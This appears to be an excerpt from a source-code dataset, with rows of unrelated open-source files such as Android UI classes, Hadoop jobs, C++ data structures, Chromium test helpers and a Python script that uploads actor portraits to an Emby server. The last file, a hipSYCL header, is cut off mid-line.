max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
446
package indi.liyi.viewer.otherui; import android.content.Context; import android.view.View; import android.view.ViewGroup; /** * 加载进度视图基类 */ public abstract class ProgressUI { private View progressView; /** * 创建加载进度视图 */ public abstract View createView(Context context); /** * 处理进度 * * @param progress 范围: 0-1 */ public abstract void handleProgress(float progress); public void init(ViewGroup parent) { if (progressView == null) { progressView = createView(parent.getContext()); } if (progressView.getParent() == null) { parent.addView(progressView); } } public void start() { if (progressView != null) { progressView.setVisibility(View.VISIBLE); } } public void stop() { if (progressView != null) { progressView.setVisibility(View.GONE); } } public View getProgressView() { return progressView; } }
467
347
#if USE_UIKIT_PUBLIC_HEADERS || !__has_include(<UIKitCore/UIBarButtonItemGroup.h>) // // UIBarButtonItemGroup.h // UIKit // // Copyright (c) 2014-2017 Apple Inc. All rights reserved. // #import <Foundation/Foundation.h> #import <UIKit/UIBarButtonItem.h> NS_ASSUME_NONNULL_BEGIN NS_CLASS_AVAILABLE_IOS(9_0) @interface UIBarButtonItemGroup : NSObject<NSCoding> /// Create a new bar button item group with the given items. When bar button item layout is done, either the group's barButtonItems or its representativeItem is displayed (if it exists). - (instancetype)initWithBarButtonItems:(NSArray<UIBarButtonItem *> *)barButtonItems representativeItem:(nullable UIBarButtonItem *)representativeItem NS_DESIGNATED_INITIALIZER; - (nullable instancetype)initWithCoder:(NSCoder *)aDecoder NS_DESIGNATED_INITIALIZER; /// The bar button items assocaited with this group. Changing these items will affect the bar displaying these items without needing to re-set the groups that are in that bar. Any UIBarButtonItems that are already in group will be removed from that group. @property (nonatomic, readwrite, copy) NSArray<UIBarButtonItem *> *barButtonItems; /// In order to display as many items as possible, bars that support UIBarButtonItemGroup may choose to collapse items associated with groups to the representativeItem specified by the group. /// A bar will only collapse groups that have a representativeItem set, but may still choose to use an alternate presentation of these items. /// A UIBarButtonItem may only be either the representativeItem or a member of the barbuttonItems of a single UIBarButtonItemGroup and may only represent a single group. /// If the representativeItem has an action, then that action will be invoked, otherwise the bar will present a standard UI to allow selection of the barButtonItems in the representedItem's group. @property (nonatomic, readwrite, strong, nullable) UIBarButtonItem *representativeItem; /// Returns YES if the representativeItem of this group is currently being displayed, rather than its barButtonItems. @property (nonatomic, readonly, assign, getter = isDisplayingRepresentativeItem) BOOL displayingRepresentativeItem; @end @interface UIBarButtonItem (UIBarButtonItemGroup) /// The group that the UIBarButtonItem is currently associated with, either as a member of the barButtonItems array or as that group's representativeItem. @property (nonatomic, readonly, weak, nullable) UIBarButtonItemGroup *buttonGroup NS_AVAILABLE_IOS(9_0); @end NS_ASSUME_NONNULL_END #else #import <UIKitCore/UIBarButtonItemGroup.h> #endif
721
469
# COLORS GRAY = "rgb(117,117,117)" LIGHT_GRAY = "rgb(224,224,224)" RED = "rgb(217, 46, 28)" TEAL = "rgb(20, 152, 181)" BLUE = "rgb(100, 143, 255)" ORANGE = "rgb(254, 97, 0)" PINK = "rgb(220, 38, 127)" YELLOW = "rgb(255, 176, 0)" PURPLE = "rgb(120, 94, 240)" # NAMED COLORS REFERENCE = GRAY FADED = LIGHT_GRAY THRESHOLD = RED PARITY_PASS = TEAL PARITY_FAIL = THRESHOLD PARITY_RESULT_PALETTE = [PARITY_PASS, PARITY_FAIL] # Colors will be selected for the groups in the chart by the # order that they are in this palette array. Therefore, the # order should maximamize constrast for smaller subsets [1:n]. CATEGORICAL_PALETTE_COLOR_SAFE = [ BLUE, ORANGE, PINK, YELLOW, PURPLE, ] CATEGORICAL_PALETTE_ALTERNATIVE = [ "rgb(106, 172, 250)", "rgb(62, 204, 156)", "rgb(255, 163, 31)", "rgb(255, 109, 135)", "rgb(182, 135, 231)", ] CATEGORICAL_COLOR_PALETTE = CATEGORICAL_PALETTE_COLOR_SAFE
433
335
<reponame>Safal08/Hacktoberfest-1 { "word": "Convey", "definitions": [ "Transport or carry to a place.", "Make (an idea, impression, or feeling) known or understandable.", "Communicate (a message or information)", "Transfer the title to (property)" ], "parts-of-speech": "Verb" }
133
412
<filename>jbmc/regression/jbmc-concurrency/get-current-thread/A.java import java.lang.Thread; import org.cprover.CProver; public class A { public static int g; // expected verification success public void me() { int g = CProver.getCurrentThreadId(); assert(g == 0); } // expected verification success // -- // KNOWNBUG // --- // For some reason symex assigns 'g' to zero, even though // the only viable assignment should be one. // This issue seems to only occur when a variable is // assigned inside the local scope of a thread-block. // // If instead, we call a function from inside the thread-block and // then assign 'g' to 1 then as expected the only viable // assignment to 'g' is 1 (see 'me4') // // Seems related to: https://github.com/diffblue/cbmc/issues/1630/ public void me_bug() { CProver.startThread(333); int g = 1; assert(g == 1); CProver.endThread(333); } // expected verification success // -- // KNOWNBUG: see me_bug() public void me2() { CProver.startThread(333); g = CProver.getCurrentThreadId(); assert(g == 1); CProver.endThread(333); } // expected verification success // -- // KNOWNBUG: see me_bug() public void me3() { CProver.startThread(333); int i = CProver.getCurrentThreadId(); assert(g == 1); CProver.endThread(333); } // expected verification success. public void me4() { CProver.startThread(333); check(); CProver.endThread(333); } // expected verification success. public void me5() { me(); B b = new B(); Thread tmp = new Thread(b); tmp.start(); } // expected verification success. public void me6() { me(); C c = new C(); c.start(); } public void check() { g = CProver.getCurrentThreadId(); assert(g == 1); } } class B implements Runnable { public static int g; @Override public void run() { g = CProver.getCurrentThreadId(); assert(g == 1); } } class C extends Thread { public static int g; @Override public void run() { g = CProver.getCurrentThreadId(); assert(g == 1); } }
802
1,038
package org.dataalgorithms.chap11.projection.secondarysort; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.Path; import org.apache.hadoop.io.Text; import org.apache.hadoop.mapred.FileInputFormat; import org.apache.hadoop.mapred.FileOutputFormat; import org.apache.hadoop.mapred.TextInputFormat; import org.apache.hadoop.mapred.TextOutputFormat; import org.apache.hadoop.util.GenericOptionsParser; import org.apache.hadoop.mapred.JobConf; import org.apache.hadoop.mapred.JobClient; import edu.umd.cloud9.io.pair.PairOfLongInt; import org.apache.log4j.Logger; import org.dataalgorithms.util.HadoopUtil; /** * MapReduce job for projecting customer transaction data * by using MapReduce's "secondary sort" (sort by shuffle function). * Note that reducer values arrive sorted by implementing the "secondary sort" * design pattern (no data is sorted in memory). * * @author <NAME> * */ public class SecondarySortProjectionDriver { private static final Logger theLogger = Logger.getLogger(SecondarySortProjectionDriver.class); public static void main(String[] args) throws Exception { long startTime = System.currentTimeMillis(); Configuration conf = new Configuration(); JobConf jobconf = new JobConf(conf, SecondarySortProjectionDriver.class); jobconf.setJobName("SecondarySortProjectionDriver"); String[] otherArgs = new GenericOptionsParser(conf, args).getRemainingArgs(); if (otherArgs.length != 2) { System.err.println("Usage: SecondarySortProjectionDriver <input> <output>"); System.exit(1); } // add jars to distributed cache HadoopUtil.addJarsToDistributedCache(conf, "/lib/"); // set mapper/reducer jobconf.setMapperClass(SecondarySortProjectionMapper.class); jobconf.setReducerClass(SecondarySortProjectionReducer.class); // define mapper's output key-value jobconf.setMapOutputKeyClass(CompositeKey.class); jobconf.setMapOutputValueClass(PairOfLongInt.class); // define reducer's output key-value jobconf.setOutputKeyClass(Text.class); jobconf.setOutputValueClass(Text.class); // define I/O FileInputFormat.setInputPaths(jobconf, new Path(otherArgs[0])); FileOutputFormat.setOutputPath(jobconf, new Path(otherArgs[1])); jobconf.setInputFormat(TextInputFormat.class); jobconf.setOutputFormat(TextOutputFormat.class); jobconf.setCompressMapOutput(true); // the following 3 setting are needed for "secondary sorting" // Partitioner decides which mapper output goes to which reducer // based on mapper output key. In general, different key is in // different group (Iterator at the reducer side). But sometimes, // we want different key in the same group. This is the time for // Output Value Grouping Comparator, which is used to group mapper // output (similar to group by condition in SQL). The Output Key // Comparator is used during sort stage for the mapper output key. jobconf.setPartitionerClass(NaturalKeyPartitioner.class); jobconf.setOutputKeyComparatorClass(CompositeKeyComparator.class); jobconf.setOutputValueGroupingComparator(NaturalKeyGroupingComparator.class); JobClient.runJob(jobconf).waitForCompletion(); long elapsedTime = System.currentTimeMillis() - startTime; theLogger.info("elapsedTime (in milliseconds): "+ elapsedTime); System.exit(0); } }
1,314
778
<filename>tuplex/utils/src/Field.cc //--------------------------------------------------------------------------------------------------------------------// // // // Tuplex: Blazing Fast Python Data Science // // // // // // (c) 2017 - 2021, Tuplex team // // Created by <NAME> first on 1/1/2021 // // License: Apache 2.0 // //--------------------------------------------------------------------------------------------------------------------// #include <Field.h> #include <sstream> #include <iomanip> // gcc fixes, needed for memcpy. Clang does not need those includes #ifdef __GNUC__ #include <cstdlib> #include <cstring> #include <cstdio> #include <string> #include <iostream> #include <Logger.h> #endif namespace tuplex { Field::Field(const double d) { _size = sizeof(double); _type = python::Type::F64; _dValue = d; _isNull = false; } Field::Field(const int64_t i) { _size = sizeof(int64_t); _type = python::Type::I64; _iValue = i; _isNull = false; } Field::Field(const bool b) { _size = sizeof(int64_t); _type = python::Type::BOOLEAN; _iValue = b; _isNull = false; } Field::Field(const std::string &s) { _size = s.length() + 1; _type = python::Type::STRING; _ptrValue = reinterpret_cast<uint8_t*>(new char[_size]); _isNull = false; // safe memory checks if(!_ptrValue) _size = 0; else std::memcpy(_ptrValue, s.c_str(), _size); } Field Field::from_str_data(const std::string &data, const python::Type &type) { Field f; f._size = data.length() + 1; f._type = type; f._ptrValue = reinterpret_cast<uint8_t*>(new char[f._size]); f._isNull = false; // safe memory checks if(!f._ptrValue) f._size = 0; else std::memcpy(f._ptrValue, data.c_str(), f._size); return f; } Field Field::from_str_data(const option<std::string> &data, const python::Type &type) { Field f; f._size = 0; f._ptrValue = nullptr; if(data.has_value()) f = from_str_data(data.value(), type); f._type = python::Type::makeOptionType(type); f._isNull = !data.has_value(); return f; } Field::Field(const Field &other) { _type = other._type; _size = other._size; _isNull = other._isNull; // special handling: // ptr type? if(other.hasPtrData()) { assert(other._ptrValue); // memcpy _ptrValue = new uint8_t[_size]; std::memcpy(_ptrValue, other._ptrValue, _size); } else { // primitive val copy (doesn't matter which) _iValue = other._iValue; } } Field::Field(const Tuple &t) { // allocate size and then transfer tuple to ptr _size = sizeof(Tuple); _type = t.getType(); _isNull = false; _ptrValue = reinterpret_cast<uint8_t*>(new Tuple(t)); } Field::Field(const List &l) { // allocate size and then transfer tuple to ptr _size = sizeof(List); _type = l.getType(); _isNull = false; _ptrValue = reinterpret_cast<uint8_t*>(new List(l)); } void Field::tuple_from_vector(const std::vector<Field> &elements) { auto t = Tuple::from_vector(elements); // call here Tuple constructor _size = sizeof(Tuple); _type = t.getType(); _isNull = false; _ptrValue = reinterpret_cast<uint8_t*>(new Tuple(t)); } Field& Field::operator = (const Field &other) { _size = other._size; _isNull = other._isNull; // special handling: // ptr type? if(other.hasPtrData()) { assert(other._ptrValue); releaseMemory(); // memcpy _ptrValue = new uint8_t[_size]; assert(_ptrValue); std::memcpy(_ptrValue, other._ptrValue, _size); } else { // primitive val copy (doesn't matter which) _iValue = other._iValue; } _type = other._type; return *this; } void Field::releaseMemory() { if(hasPtrData()) { if(_ptrValue) { // select correct deletion method! if(_type.withoutOptions().isListType() || _type.withoutOptions().isTupleType()) delete _ptrValue; else delete [] _ptrValue; } _ptrValue = nullptr; } } Field::~Field() { // check for memory related var fields. If so, delete ptr! releaseMemory(); } std::string StringFromCJSONKey(const char* keyString, const char type) { assert(keyString); switch(type) { case 's': return "'" + std::string(keyString) + "'"; case 'b': return std::string(keyString); case 'i': return std::string(keyString); case 'f': return std::string(keyString); default: return "badtype"; } } std::string StringFromCJSONVal(const cJSON* obj, const char type) { switch(type) { case 's': return "'" + std::string(obj->valuestring) + "'"; case 'b': return cJSON_IsTrue(obj) ? "True" : "False"; case 'i': return std::to_string((int64_t)(obj->valuedouble)); case 'f': { std::ostringstream oss; // use up to 5 digits for precision // and a non trailing zero format oss << std::setprecision(5) << std::noshowpoint << obj->valuedouble; return oss.str(); } default: return "badtype"; } } std::string PrintCJSONDict(cJSON* dict) { assert(dict); std::string ret = "{"; cJSON *cur_item = dict->child; bool first = true; while(cur_item) { // add the correct comma if(first) first = false; else ret += ","; char *key = cur_item->string; auto keyStr = StringFromCJSONKey(key + 2, key[0]); auto valStr = StringFromCJSONVal(cur_item, key[1]); ret += keyStr + ":" + valStr; cur_item = cur_item->next; } ret += "}"; return ret; } std::string Field::desc() const { if(_isNull) // also holds for NULLVALUE type field. return "None"; if(_type == python::Type::PYOBJECT) return "object"; if(_type.isOptionType()) return extractDesc(_type.getReturnType()); return extractDesc(_type); } std::string Field::extractDesc(const python::Type& type) const { if(python::Type::BOOLEAN == type) { if(this->_iValue > 0) return "True"; else return "False"; } else if(python::Type::I64 == type) { return std::to_string(_iValue); } else if(python::Type::F64 == type) { std::ostringstream oss; // use up to 5 digits for precision // and a non trailing zero format oss << std::setprecision(5) << std::fixed << _dValue; return oss.str(); return std::to_string(this->_dValue); } else if(python::Type::STRING == type) { std::string s; s = std::string(reinterpret_cast<char*>(_ptrValue)); return "'" + s + "'"; } else if(type.isTupleType()) { Tuple *t = (Tuple*) this->_ptrValue; return t->desc(); } else if(type.isDictionaryType() || type == python::Type::GENERICDICT) { char *dstr = reinterpret_cast<char*>(_ptrValue); return PrintCJSONDict(cJSON_Parse(dstr)); } else if(type.isListType()) { List *l = (List*)this->_ptrValue; return l->desc(); } else { return "badtype"; } } bool operator == (const Field& lhs, const Field& rhs) { // check if types match if(lhs._type != rhs._type) return false; // check if has ptr data assert(lhs.hasPtrData() == rhs.hasPtrData()); if(lhs.hasPtrData()) { if(lhs._size != rhs._size) return false; // type dependent check if(lhs._type == python::Type::STRING) { // perform string comparison return strcmp((char*)lhs.getPtr(), (char*)rhs.getPtr()) == 0; } else if(lhs._type == python::Type::EMPTYTUPLE || lhs._type == python::Type::EMPTYLIST || lhs._type == python::Type::EMPTYDICT) { return true; } else if(lhs._type.isTupleType()) { Tuple *tr= (Tuple*)lhs.getPtr(); Tuple *tl = (Tuple*)rhs.getPtr(); return *tr == *tl; } else if(lhs._type.isListType()) { List *ll = (List*)lhs.getPtr(); List *lr = (List*)rhs.getPtr(); return *ll == *lr; } else { Logger::instance().defaultLogger().error("trying to compare for Field equality of " "Field with type " + lhs._type.desc() +". Not yet implemented"); exit(1); } } else { return lhs._iValue == rhs._iValue; } } // needs to be declared here b.c. of incomplete Tuple Type... Field Field::empty_tuple() { return Field(Tuple()); } Field Field::empty_list() { return Field(List()); } Field Field::upcastTo_unsafe(const Field &f, const python::Type &targetType) { auto t = f.getType(); if(f._type == targetType) return f; // null upcast to any if(f._type == python::Type::NULLVALUE && targetType.isOptionType()) { Field r; r._type = targetType; r._isNull = true; r._size = 0; r._ptrValue = nullptr; return r; } // emptylist to any list if(f._type == python::Type::EMPTYLIST && targetType.isListType()) { // upcast to list throw std::runtime_error("not yet implemented, pls add"); } // emptydict to any dict if(f._type == python::Type::EMPTYDICT && targetType.isDictionaryType()) { // upcast to any dict throw std::runtime_error("not yet implemented, pls add"); } // tuple type, recursive action // is f.type not option and target Type is option? if(!f._type.isOptionType() && targetType.isOptionType()) { Field c = upcastTo_unsafe(f, targetType.elementType()); c._type = targetType; c._isNull = false; // f is not an option type, therefore can't be 0! return c; } if(f._type.isOptionType() && targetType.isOptionType()) { auto tmp = f; tmp._type = f._type.getReturnType(); Field c = upcastTo_unsafe(tmp, targetType.elementType()); c._type = targetType; c._isNull = f._isNull; } if(t == python::Type::BOOLEAN) { if(targetType == python::Type::I64) return Field((int64_t)f._iValue); if(targetType == python::Type::F64) return Field((double)f._iValue); } if(t == python::Type::I64 && targetType == python::Type::F64) { return Field((double)f._iValue); } #ifndef NDEBUG throw std::runtime_error("bad field in upcast"); #endif // @TODO: construct dummy based on target type return Field::null(); } Field Field::from_pickled_memory(const uint8_t *buf, size_t buf_size) { assert(buf); Field f; f._isNull = false; f._type = python::Type::PYOBJECT; f._size = buf_size; f._ptrValue = new uint8_t[buf_size]; memcpy(f._ptrValue, buf, buf_size); return f; } }
6,791
1,283
<filename>hikyuu/admin/service/config.py # -*- coding: utf-8 -*- from PyQt5 import QtCore server_api_config = { "protocol": "http", "prefix": "hku", "version": "v1", } def getserviceUrl(host_url, port, service, api): return "{}://{}:{}/{}/{}/{}/{}".format( server_api_config["protocol"], host_url, port, server_api_config["prefix"], service, server_api_config["version"], api ) def defaultRequestHeader(): header = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept-Encoding": "gzip, deflate, br" } loc = QtCore.QLocale() if loc.language() == QtCore.QLocale.Chinese: header["Accept-Language"] = "zh_CN" return header
354
809
<reponame>nikitavlaev/embox<filename>src/arch/xen/ipl.h /** * @file * @brief * * @author <NAME> * @date 18.03.2018 */ #ifndef XEN_IPL_H_ #define XEN_IPL_H_ #ifndef __ASSEMBLER__ typedef unsigned char __ipl_t; extern void ipl_init(void); extern __ipl_t ipl_save(void); extern void ipl_restore(__ipl_t ipl); #endif /* __ASSEMBLER__ */ #endif /* XEN_IPL_H_ */
180
496
<gh_stars>100-1000 /* * Licensed to Elasticsearch B.V. under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch B.V. licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package co.elastic.apm.agent.servlet.helper; import co.elastic.apm.agent.impl.ElasticApmTracer; import javax.servlet.ServletContext; import javax.servlet.http.HttpServletRequest; public class JavaxServletTransactionCreationHelper extends ServletTransactionCreationHelper<HttpServletRequest, ServletContext> { public JavaxServletTransactionCreationHelper(ElasticApmTracer tracer) { super(tracer); } @Override protected String getServletPath(HttpServletRequest httpServletRequest) { return httpServletRequest.getServletPath(); } @Override protected String getPathInfo(HttpServletRequest httpServletRequest) { return httpServletRequest.getPathInfo(); } @Override protected String getHeader(HttpServletRequest httpServletRequest, String headerName) { return httpServletRequest.getHeader(headerName); } @Override protected ServletContext getServletContext(HttpServletRequest httpServletRequest) { return httpServletRequest.getServletContext(); } @Override protected ClassLoader getClassLoader(ServletContext servletContext) { return servletContext.getClassLoader(); } @Override protected CommonServletRequestHeaderGetter getRequestHeaderGetter() { return JavaxServletRequestHeaderGetter.getInstance(); } @Override protected String getContextPath(HttpServletRequest httpServletRequest) { return httpServletRequest.getContextPath(); } @Override protected String getRequestURI(HttpServletRequest httpServletRequest) { return httpServletRequest.getRequestURI(); } }
750
25,360
<reponame>linzhaojia77/jeecg-boot<gh_stars>1000+ package org.jeecg.common.util; import org.apache.commons.lang3.StringUtils; import org.springframework.web.util.HtmlUtils; /** * HTML 工具类 */ public class HTMLUtils { /** * 获取HTML内的文本,不包含标签 * * @param html HTML 代码 */ public static String getInnerText(String html) { if (StringUtils.isNotBlank(html)) { //去掉 html 的标签 String content = html.replaceAll("</?[^>]+>", ""); // 将多个空格合并成一个空格 content = content.replaceAll("(&nbsp;)+", "&nbsp;"); // 反向转义字符 content = HtmlUtils.htmlUnescape(content); return content.trim(); } return ""; } }
422
370
[ { "role": "WRITER", "userByEmail": "<EMAIL>" }, { "role": "OWNER", "groupByEmail": "<EMAIL>" } ]
65
483
package org.yczbj.ycrefreshviewlib.view; import android.support.v7.util.DiffUtil; import java.util.List; public class DiffCallBack<T> extends DiffUtil.Callback { /** * 分别是旧数据和新数据集合,这里使用泛型 */ private List<T> oldList , newList; public DiffCallBack(List<T> oldList , List<T> newList){ this.oldList = oldList; this.newList = newList; } /** * 获取旧数据的长度 * @return 长度 */ @Override public int getOldListSize() { return oldList!=null ? oldList.size() : 0; } /** * 获取新数据的长度 * @return 长度 */ @Override public int getNewListSize() { return newList!=null ? newList.size() : 0; } /** * * @param i i * @param i1 i * @return */ @Override public boolean areItemsTheSame(int i, int i1) { return false; } /** * * @param i * @param i1 * @return */ @Override public boolean areContentsTheSame(int i, int i1) { return false; } }
621
1,064
<gh_stars>1000+ # -*- coding:utf-8 -*- import requests, os from configparser import RawConfigParser from base64 import b64encode from traceback import format_exc from json import loads from os.path import exists # 检查“演员头像”文件夹是否就绪 if not exists('演员头像'): input('\n“演员头像”文件夹丢失!请把它放进exe的文件夹中!\n') # 读取配置文件,这个ini文件用来给用户设置emby网址和api id print('正在读取ini中的设置...') config_settings = RawConfigParser() try: config_settings.read('【点我设置整理规则】.ini', encoding='utf-8-sig') url_emby = config_settings.get("emby/jellyfin", "网址") api_key = config_settings.get("emby/jellyfin", "api id") bool_replace = True if config_settings.get("emby/jellyfin", "是否覆盖以前上传的头像?") == '是' else False except: url_emby = api_key = '' bool_replace = False print(format_exc()) input('无法读取ini文件,请修改它为正确格式,或者打开“【ini】重新创建ini.exe”创建全新的ini!') print('读取ini文件成功!\n') # 修正用户输入的emby网址,无论是不是带“/” url_emby = url_emby.strip('/') # 成功的个数 num_suc = 0 num_fail = 0 num_exist = 0 sep = os.sep try: print('正在获取取emby中Persons清单...') # curl -X GET "http://localhost:8096/emby/Persons?api_key=<KEY>" -H "accept: application/json" # 得到所有“人员” emby api没有细分“演员”还是“导演”“编剧”等等 下面得到的是所有“有关人员” url_emby_persons = f'{url_emby}/emby/Persons?api_key={api_key}' # &PersonTypes=Actor try: rqs_emby = requests.get(url=url_emby_persons) except requests.exceptions.ConnectionError: input(f'无法访问emby服务端,请检查: {url_emby}\n') except: print(format_exc()) input(f'发生未知错误,请截图并联系作者: {url_emby}\n') # 401,无权访问 if rqs_emby.status_code == 401: input('请检查api id是否正确!\n') # print(rqs_emby.text) try: list_persons = loads(rqs_emby.text)['Items'] except: list_persons = [] print(rqs_emby.text) print('发生错误!emby返回内容如上: ') input('请截图并联系作者!') num_persons = len(list_persons) print(f'当前有{num_persons}个Person!\n') # 用户emby中的persons,在“演员头像”文件夹中,已有头像的,记录下来 f_txt = open("已收录的人员清单.txt", 'w', encoding="utf-8") f_txt.close() f_txt = open("未收录的人员清单.txt", 'w', encoding="utf-8") f_txt.close() for dic_each_actor in list_persons: actor_name = dic_each_actor['Name'] # 头像jpg/png在“演员头像”中的路径 actor_pic_path = f'演员头像{sep}{actor_name[0]}{sep}{actor_name}' if exists(f'{actor_pic_path}.jpg'): actor_pic_path = f'{actor_pic_path}.jpg' header = {"Content-Type": 'image/jpeg', } elif exists(f'{actor_pic_path}.png'): actor_pic_path = f'{actor_pic_path}.png' header = {"Content-Type": 'image/png', } else: print('>>暂无头像: ', actor_name) f_txt = open("未收录的人员清单.txt", 'a', encoding="utf-8") f_txt.write(f'{actor_name}\n') f_txt.close() num_fail += 1 continue # emby有某个演员,“演员头像”文件夹也有这个演员的头像,记录一下 f_txt = open("已收录的人员清单.txt", 'a', encoding="utf-8") f_txt.write(f'{actor_name}\n') f_txt.close() # emby有某个演员,已经有他的头像,不再进行下面“上传头像”的操作 if dic_each_actor['ImageTags']: # emby已经收录头像 num_exist += 1 if not bool_replace: # 不需要覆盖已有头像 continue # 那么不进行下面的上传操作 f_pic = open(actor_pic_path, 'rb') # 二进制方式打开图文件 b6_pic = b64encode(f_pic.read()) # 读取文件内容,转换为base64编码 f_pic.close() url_post_img = f'{url_emby}/emby/Items/{dic_each_actor["Id"]}/Images/Primary?api_key={api_key}' requests.post(url=url_post_img, data=b6_pic, headers=header) print('>>设置成功: ', actor_name) num_suc += 1 print('\nemby/jellyfin拥有人员', num_persons, '个!') print('已有头像', num_exist, '个!') if bool_replace: print('当前模式: 覆盖以前上传的头像') else: print('当前模式: 跳过以前上传的头像') print('成功上传', num_suc, '个!') print('暂无头像', num_fail, '个!') input('已保存至“未收录的人员清单.txt”\n') except: print(format_exc()) print('发生错误!emby返回内容如上: ') input('请截图并联系作者!')
2,852
575
<filename>extensions/test/test_background_page_ready_observer.cc<gh_stars>100-1000 // Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "extensions/test/test_background_page_ready_observer.h" #include "base/bind.h" #include "content/public/browser/notification_source.h" #include "content/public/test/test_utils.h" #include "extensions/browser/extension_registry.h" #include "extensions/browser/extension_system.h" #include "extensions/browser/notification_types.h" #include "extensions/browser/runtime_data.h" #include "extensions/common/extension.h" #include "extensions/common/extension_id.h" namespace extensions { namespace { bool IsExtensionBackgroundPageReady( content::BrowserContext* browser_context, const extensions::ExtensionId& extension_id) { const auto* const extension_registry = extensions::ExtensionRegistry::Get(browser_context); if (!extension_registry) return false; const extensions::Extension* const extension = extension_registry->GetInstalledExtension(extension_id); if (!extension) return false; auto* const extension_system = extensions::ExtensionSystem::Get(browser_context); if (!extension_system) return false; return extension_system->runtime_data()->IsBackgroundPageReady(extension); } } // namespace ExtensionBackgroundPageReadyObserver::ExtensionBackgroundPageReadyObserver( content::BrowserContext* browser_context, const extensions::ExtensionId& extension_id) : browser_context_(browser_context), extension_id_(extension_id), notification_observer_( extensions::NOTIFICATION_EXTENSION_BACKGROUND_PAGE_READY, base::BindRepeating( &ExtensionBackgroundPageReadyObserver::IsNotificationRelevant, base::Unretained(this))) {} ExtensionBackgroundPageReadyObserver::~ExtensionBackgroundPageReadyObserver() = default; void ExtensionBackgroundPageReadyObserver::Wait() { notification_observer_.Wait(); } bool ExtensionBackgroundPageReadyObserver::IsNotificationRelevant( const content::NotificationSource& source, const content::NotificationDetails& /*details*/) const { if (content::Source<const extensions::Extension>(source)->id() != extension_id_) { return false; } // Double-check via the extension system, since the notification could be // for a different profile. return IsExtensionBackgroundPageReady(browser_context_, extension_id_); } } // namespace extensions
819
2,151
<reponame>oz90210/blackmamba<gh_stars>1000+ """Optional fixer that changes all unprefixed string literals "..." to b"...". br'abcd' is a SyntaxError on Python 2 but valid on Python 3. ur'abcd' is a SyntaxError on Python 3 but valid on Python 2. """ from __future__ import unicode_literals import re from lib2to3.pgen2 import token from lib2to3 import fixer_base _literal_re = re.compile(r"[^bBuUrR]?[\'\"]") class FixBytes(fixer_base.BaseFix): BM_compatible = True PATTERN = "STRING" def transform(self, node, results): if node.type == token.STRING: if _literal_re.match(node.value): new = node.clone() new.value = u'b' + new.value return new
308
1,338
/* * Copyright 2009-2010, <NAME>, <EMAIL>. * Distributed under the terms of the MIT License. */ #include <slab/Slab.h> #include <stdlib.h> #include <new> struct ObjectCache { ObjectCache(const char *name, size_t objectSize, size_t alignment, size_t maxByteUsage, uint32 flags, void *cookie, object_cache_constructor constructor, object_cache_destructor destructor, object_cache_reclaimer reclaimer) : objectSize(objectSize), cookie(cookie), objectConstructor(constructor), objectDestructor(destructor) { } size_t objectSize; void* cookie; object_cache_constructor objectConstructor; object_cache_destructor objectDestructor; }; object_cache * create_object_cache(const char *name, size_t objectSize, size_t alignment, void *cookie, object_cache_constructor constructor, object_cache_destructor destructor) { return new(std::nothrow) ObjectCache(name, objectSize, alignment, 0, 0, cookie, constructor, destructor, NULL); } object_cache * create_object_cache_etc(const char *name, size_t objectSize, size_t alignment, size_t maxByteUsage, size_t magazineCapacity, size_t maxMagazineCount, uint32 flags, void *cookie, object_cache_constructor constructor, object_cache_destructor destructor, object_cache_reclaimer reclaimer) { return new(std::nothrow) ObjectCache(name, objectSize, alignment, maxByteUsage, flags, cookie, constructor, destructor, reclaimer); } void delete_object_cache(object_cache *cache) { delete cache; } status_t object_cache_set_minimum_reserve(object_cache *cache, size_t objectCount) { return B_OK; } void * object_cache_alloc(object_cache *cache, uint32 flags) { void* object = cache != NULL ? malloc(cache->objectSize) : NULL; if (object == NULL) return NULL; if (cache->objectConstructor != NULL) cache->objectConstructor(cache->cookie, object); return object; } void object_cache_free(object_cache *cache, void *object, uint32 flags) { if (object != NULL) { if (cache != NULL && cache->objectDestructor != NULL) cache->objectDestructor(cache->cookie, object); free(object); } } status_t object_cache_reserve(object_cache *cache, size_t object_count, uint32 flags) { return B_OK; } void object_cache_get_usage(object_cache *cache, size_t *_allocatedMemory) { *_allocatedMemory = 0; }
794
529
<filename>include/hipSYCL/sycl/libkernel/atomic.hpp<gh_stars>100-1000 /* * This file is part of hipSYCL, a SYCL implementation based on CUDA/HIP * * Copyright (c) 2018 <NAME> * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef HIPSYCL_ATOMIC_HPP #define HIPSYCL_ATOMIC_HPP #include <type_traits> #include 